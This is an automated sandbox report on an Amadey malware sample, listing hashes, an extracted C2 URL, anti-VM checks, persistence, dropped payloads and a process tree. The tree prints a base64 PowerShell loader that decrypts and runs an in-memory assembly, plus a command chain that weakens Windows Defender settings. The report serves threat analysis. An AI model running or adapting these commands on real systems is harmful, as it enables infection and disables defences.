amadey | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea

Analysis

max time kernel
64s
max time network
92s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
11/05/2024, 22:25

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Size

1.8MB
MD5

aa09230e5ed56143e839e2de4a55ff84
SHA1

ac65861dfb9663bffb9e3debfbefadf2d7f18c67
SHA256

c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea
SHA512

92bd273f18be76cadb1f73d4897770ba2ebd7b2495b0de8e335290ed1be9d003b34859b9f24577326ebe477ed339c9affd1c57a8732aac8424b74ab448132cba
SSDEEP

24576:tPh8UVW8RXWZ6gprwfpN6ZubIu85NeUSlTwIqVQFtI6a4wfDHtHavmcQi7fI83pa:tZfqUN6R5HmFzTw5HohQup3pXK

Score

10^/10

amadey privateloader rhadamanthys evasion execution loader stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	CDwwlA0Ls45oQEjOyyQKhuPH.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3692 created 1084	3692	deat.exe	50

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QIzW4tTnR5wqxhqY3fzpSUXQ.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bSAYlQpWBGa5aJGrotVK9Gdj.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z1QRKg56FPaUBj9lH8ZZhZUq.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xG3Dia32NuP8zHqHStzoZEVB.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sr8ILJx7yg64A1wFkUmquwVS.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wBlX6H1a9hrkhVlJlStFwR30.bat	jsc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\teQ8AtSSxpu2pFNcIagfsp4u.bat	jsc.exe

Executes dropped EXE 10 IoCs

pid	Process
3992	axplons.exe
1912	lumma1.exe
3024	axplons.exe
2948	file300un.exe
3692	deat.exe
2200	7qGcwJrNG8TOz7Ue3r67oBl0.exe
2864	IEjcMJAJkbtWNiKSfd04xP0y.exe
984	t4ogfR8kzuEXiFbHpQ2MOvGH.exe
1716	35bjmBERCDyFvBhlEXzObc63.exe
4944	CDwwlA0Ls45oQEjOyyQKhuPH.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine	axplons.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
11	pastebin.com
16	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
31	ipinfo.io
36	ipinfo.io

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	CDwwlA0Ls45oQEjOyyQKhuPH.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	CDwwlA0Ls45oQEjOyyQKhuPH.exe
File opened for modification	C:\Windows\System32\GroupPolicy	CDwwlA0Ls45oQEjOyyQKhuPH.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	CDwwlA0Ls45oQEjOyyQKhuPH.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
3492	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
3992	axplons.exe
3024	axplons.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1912 set thread context of 2600	1912	lumma1.exe	86
PID 1444 set thread context of 1128	1444	powershell.exe	95

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1444	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3492	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
3492	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
3992	axplons.exe
3992	axplons.exe
3024	axplons.exe
3024	axplons.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
1444	powershell.exe
3692	deat.exe
3692	deat.exe
564	dialer.exe
564	dialer.exe
564	dialer.exe
564	dialer.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	1128	jsc.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 3492 wrote to memory of 3992	3492	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe	82
PID 3492 wrote to memory of 3992	3492	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe	82
PID 3492 wrote to memory of 3992	3492	c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe	82
PID 3992 wrote to memory of 1912	3992	axplons.exe	83
PID 3992 wrote to memory of 1912	3992	axplons.exe	83
PID 3992 wrote to memory of 1912	3992	axplons.exe	83
PID 1912 wrote to memory of 4012	1912	lumma1.exe	85
PID 1912 wrote to memory of 4012	1912	lumma1.exe	85
PID 1912 wrote to memory of 4012	1912	lumma1.exe	85
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 1912 wrote to memory of 2600	1912	lumma1.exe	86
PID 3992 wrote to memory of 2948	3992	axplons.exe	88
PID 3992 wrote to memory of 2948	3992	axplons.exe	88
PID 2948 wrote to memory of 2892	2948	file300un.exe	90
PID 2948 wrote to memory of 2892	2948	file300un.exe	90
PID 2892 wrote to memory of 1444	2892	cmd.exe	91
PID 2892 wrote to memory of 1444	2892	cmd.exe	91
PID 3992 wrote to memory of 3692	3992	axplons.exe	93
PID 3992 wrote to memory of 3692	3992	axplons.exe	93
PID 3992 wrote to memory of 3692	3992	axplons.exe	93
PID 3692 wrote to memory of 564	3692	deat.exe	94
PID 3692 wrote to memory of 564	3692	deat.exe	94
PID 3692 wrote to memory of 564	3692	deat.exe	94
PID 3692 wrote to memory of 564	3692	deat.exe	94
PID 3692 wrote to memory of 564	3692	deat.exe	94
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 1128	1444	powershell.exe	95
PID 1444 wrote to memory of 4980	1444	powershell.exe	96
PID 1444 wrote to memory of 4980	1444	powershell.exe	96
PID 1444 wrote to memory of 4980	1444	powershell.exe	96
PID 1128 wrote to memory of 2200	1128	jsc.exe	100
PID 1128 wrote to memory of 2200	1128	jsc.exe	100
PID 1128 wrote to memory of 2200	1128	jsc.exe	100
PID 1128 wrote to memory of 2864	1128	jsc.exe	101
PID 1128 wrote to memory of 2864	1128	jsc.exe	101
PID 1128 wrote to memory of 2864	1128	jsc.exe	101
PID 1128 wrote to memory of 984	1128	jsc.exe	102
PID 1128 wrote to memory of 984	1128	jsc.exe	102
PID 1128 wrote to memory of 984	1128	jsc.exe	102
PID 1128 wrote to memory of 1716	1128	jsc.exe	103
PID 1128 wrote to memory of 1716	1128	jsc.exe	103
PID 1128 wrote to memory of 1716	1128	jsc.exe	103
PID 1128 wrote to memory of 4944	1128	jsc.exe	104
PID 1128 wrote to memory of 4944	1128	jsc.exe	104

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:1084
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:564

C:\Users\Admin\AppData\Local\Temp\c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
"C:\Users\Admin\AppData\Local\Temp\c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3492
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
  "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3992
- - C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4012
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2600
- - C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGIAOABuAGIAMQB5ADYAcAA5AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA=="
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIAAdZ7GCFVn+YiAAewAKACAAIAAgACAAcABhAHIAYQBtACAAKAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJACFaLGCLAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJADgf/l6LAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAA9hPZTCgAgACAAIAAgACkACgAKACAAIAAgACAAJADOmF17IAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoAIAAgACAAIAAkAM6YXXsuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJADOmF17LgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJAA1dDZ0IAA9ACAAJADOmF17LgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQAhWixgiwAIAAkAOB/+XopAAoAIAAgACAAIAAkANiY6pYgAD0AIAAkADV0NnQuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAD2E9lMsACAAMAAsACAAJAA9hPZTLgBMAGUAbgBnAHQAaAApAAoACgAgACAAIAAgACQAzphdey4ARABpAHMAcABvAHMAZQAoACkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJADYmOqWCgB9AAoACgAkAENosYIgAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAGIAOABuAGIAMQB5ADYAcAA5AC4AdABtAHAAJwA7AAoAJACyg7GCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAENosYIpADsACgAKACQAhWixgiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEMAMwAsADAAeAAyADEALAAwAHgARgBEACwAMAB4AEEARAAsADAAeAAxAEEALAAwAHgANQA0ACwAMAB4ADYARAAsADAAeAA2ADQALAAwAHgAQgBDACwAMAB4ADkARQAsADAAeAAzAEEALAAwAHgAQwBFACwAMAB4AEMAMAAsADAAeAA1AEQALAAwAHgAOQBCACwAMAB4AEMAMQAsADAAeAA3AEEALAAwAHgAOQA1ACwAMAB4ADgANAAsADAAeABGADUALAAwAHgARABCACwAMAB4ADcAMQAsADAAeABBADIALAAwAHgAMAAzACwAMAB4ADIAOAAsADAAeAAzAEYALAAwAHgARQBEACwAMAB4ADIAQwAsADAAeAA0ADAALAAwAHgARABEACwAMAB4ADUAMQAsADAAeAAxAEMAKQAKACQA4H/5eiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADAARQAsADAAeAA3ADkALAAwAHgAMQA1ACwAMAB4AEEAMQAsADAAeABEADkALAAwAHgAOQBBACwAMAB4ADMARgAsADAAeABGAEEALAAwAHgAMwA1ACwAMAB4ADEAQgAsADAAeAA5ADEALAAwAHgARgAzACwAMAB4ADQAMQAsADAAeABFADQALAAwAHgAMAA0ACwAMAB4ADMARQApAAoACgAkAD2E9lMgAD0AIAAdZ7GCFVn+YiAALQCFaLGCIAAkAIVosYIgAC0A4H/5eiAAJADgf/l6IAAtAD2E9lMgACQAsoOxggoACgAkALKEbFHxgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQAPYT2UykAKQA7AAoAJADLeUNTIAA9ACAAJACyhGxR8YIuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAy3lDUy4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgAKAA==
        5⤵
        Suspicious use of SetThreadContext
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1444
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        6⤵
        Drops startup file
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1128
        
        C:\Users\Admin\Pictures\7qGcwJrNG8TOz7Ue3r67oBl0.exe
        
        "C:\Users\Admin\Pictures\7qGcwJrNG8TOz7Ue3r67oBl0.exe"
        7⤵
        Executes dropped EXE
        
        PID:2200
        
        C:\Users\Admin\Pictures\IEjcMJAJkbtWNiKSfd04xP0y.exe
        
        "C:\Users\Admin\Pictures\IEjcMJAJkbtWNiKSfd04xP0y.exe"
        7⤵
        Executes dropped EXE
        
        PID:2864
        
        C:\Users\Admin\Pictures\t4ogfR8kzuEXiFbHpQ2MOvGH.exe
        
        "C:\Users\Admin\Pictures\t4ogfR8kzuEXiFbHpQ2MOvGH.exe"
        7⤵
        Executes dropped EXE
        
        PID:984
        
        C:\Users\Admin\AppData\Local\Temp\urc.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\urc.0.exe"
        8⤵
        
        PID:4724
        
        C:\Users\Admin\Pictures\35bjmBERCDyFvBhlEXzObc63.exe
        
        "C:\Users\Admin\Pictures\35bjmBERCDyFvBhlEXzObc63.exe"
        7⤵
        Executes dropped EXE
        
        PID:1716
        
        C:\Users\Admin\Pictures\CDwwlA0Ls45oQEjOyyQKhuPH.exe
        
        "C:\Users\Admin\Pictures\CDwwlA0Ls45oQEjOyyQKhuPH.exe"
        7⤵
        Modifies firewall policy service
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4944
        
        C:\Users\Admin\Pictures\9RcB2lrFzwAc9yeZcDFpU6Tm.exe
        
        "C:\Users\Admin\Pictures\9RcB2lrFzwAc9yeZcDFpU6Tm.exe"
        7⤵
        
        PID:3716
        
        C:\Users\Admin\Pictures\n3rp3ahi5KCTVJeUG6vZj6EO.exe
        
        "C:\Users\Admin\Pictures\n3rp3ahi5KCTVJeUG6vZj6EO.exe"
        7⤵
        
        PID:3820
        
        C:\Users\Admin\AppData\Local\Temp\7zS56B6.tmp\Install.exe
        
        .\Install.exe /tEdidDDf "385118" /S
        8⤵
        
        PID:4912
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        9⤵
        
        PID:1784
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        6⤵
        
        PID:4980
- - C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe
    "C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3692

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

Filesize
1.2MB

MD5
56e7d98642cfc9ec438b59022c2d58d7

SHA1
26526f702e584d8c8b629b2db5d282c2125665d7

SHA256
a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

SHA512
0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe

Filesize
30.6MB

MD5
33787bb1279b90b829281fadd9842da7

SHA1
232be73341f6211f20e289fde16988790f62fe33

SHA256
a94db0a466893661cb536296f2f12ca0799d6fc796829584f5141ad0adee3fcc

SHA512
863edf4d9aafa7cea85e663dd0d6435137fd2ebc76cc8221b38dd7155d715e563d3502faba6a6858afbef2898cb44924b53ea71793ac90125004e79985a4419d

